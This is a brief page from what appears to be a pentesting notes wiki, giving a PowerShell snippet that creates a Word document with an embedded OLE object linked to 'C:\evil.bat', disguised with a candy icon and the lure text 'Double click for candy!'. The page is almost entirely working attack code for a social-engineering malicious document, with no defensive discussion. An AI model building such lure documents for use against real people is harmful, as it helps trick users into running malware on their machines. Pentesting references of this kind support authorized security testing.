OLE

From BHaFSec Pentesting Notes Wiki
Jump to: navigation, search

Plant a malicious OLE into a Word document:

$word = New-Object -ComObject Word.Application
$word.visible = $true
$objDoc = $word.Documents.Add()
$objSelection = $word.Selection
$objSelection.TypeText("Double click for candy!")
$objSelection.InlineShapes.AddOLEObject(,'C:\evil.bat',$false,$true,'C:\candy.ico')

.